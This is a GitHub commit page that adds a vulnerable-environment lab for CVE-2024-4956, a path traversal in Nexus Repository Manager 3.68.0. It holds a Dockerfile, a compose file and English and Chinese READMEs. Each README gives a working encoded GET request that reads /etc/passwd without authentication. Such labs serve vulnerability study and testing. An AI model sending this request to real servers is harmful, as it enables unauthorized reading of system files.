-
-
Notifications
You must be signed in to change notification settings - Fork 4.4k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
Showing
7 changed files
with
107 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
FROM sonatype/nexus3:3.68.0 | ||
|
||
LABEL maintainer="phithon <[email protected]>" | ||
|
||
USER root | ||
|
||
RUN set -ex \ | ||
&& sed -i 's/storage\.diskCache\.diskFreeSpaceLimit=4096/storage.diskCache.diskFreeSpaceLimit=512/' /opt/sonatype/nexus/etc/karaf/system.properties \ | ||
&& echo "-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005" >> /opt/sonatype/nexus/bin/nexus.vmoptions |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,46 @@ | ||
# Nexus Repository Manager 3 Unauthenticated Path Traversal (CVE-2024-4956) | ||
|
||
[中文版本(Chinese version)](README.zh-cn.md) | ||
|
||
Nexus Repository Manager is a repository manager that organizes, stores and distributes artifacts needed for development. | ||
|
||
A path traversal vulnerability has been discovered in Nexus Repository 3 before version 3.68.1, the vulnerability allows for an attacker to craft a URL to return any file as a download, including system files outside of Nexus Repository application scope, without any authentication. | ||
|
||
References: | ||
|
||
- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16> | ||
|
||
## Vulnerable environment | ||
|
||
Execute following command to start a Nexus Repository Manager version 3.68.0: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
After the server is started, browse `http://your-ip:8081` to see the home page of Nexus. | ||
|
||
## Exploit | ||
|
||
Just like SpringMVC CVE-2018-1271 from Orange Tsai's [share](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf), Jetty's `URIUtil.canonicalPath()` also treats the empty string as a directory whih is the root case of this vulnerability: | ||
|
||
![](1.png) | ||
|
||
Simply send following request to reproduce the issue: | ||
|
||
``` | ||
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 | ||
Host: localhost:8081 | ||
Accept-Encoding: gzip, deflate, br | ||
Accept: */* | ||
Accept-Language: en-US;q=0.9,en;q=0.8 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
``` | ||
|
||
As you can see, `/etc/passwd` has been exposed directly: | ||
|
||
![](2.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,42 @@ | ||
# Nexus Repository Manager 3 未授权目录穿越漏洞(CVE-2024-4956) | ||
|
||
Nexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。 | ||
|
||
其3.68.0及之前版本中,存在一处目录穿越漏洞。攻击者可以利用该漏洞读取服务器上任意文件。 | ||
|
||
参考链接: | ||
|
||
- <https://support.sonatype.com/hc/en-us/articles/29416509323923-CVE-2024-4956-Nexus-Repository-3-Path-Traversal-2024-05-16> | ||
|
||
## 漏洞环境 | ||
|
||
执行如下命令启动一个Nexus Repository Manager version 3.68.0 版本服务器: | ||
|
||
``` | ||
docker compose up -d | ||
``` | ||
|
||
环境启动后,访问`http://your-ip:8081`即可看到Nexus的默认页面。 | ||
|
||
## 漏洞复现 | ||
|
||
与Orange Tsai在[Blackhat US 2018](https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf)分享的SpringMVC CVE-2018-1271漏洞类似,Jetty的`URIUtil.canonicalPath()`函数也将空字符串认为是一个合法目录,导致了该漏洞的产生: | ||
|
||
发送如下请求来复现漏洞: | ||
|
||
``` | ||
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 | ||
Host: localhost:8081 | ||
Accept-Encoding: gzip, deflate, br | ||
Accept: */* | ||
Accept-Language: en-US;q=0.9,en;q=0.8 | ||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36 | ||
Connection: close | ||
Cache-Control: max-age=0 | ||
``` | ||
|
||
可见,`/etc/passwd`已被成功读取: | ||
|
||
![](1.png) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1 @@ | ||
admin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,9 @@ | ||
version: '3' | ||
services: | ||
web: | ||
image: vulhub/nexus:3.68.0 | ||
ports: | ||
- "8081:8081" | ||
- "5005:5005" | ||
volumes: | ||
- ./admin.password:/nexus-data/admin.password |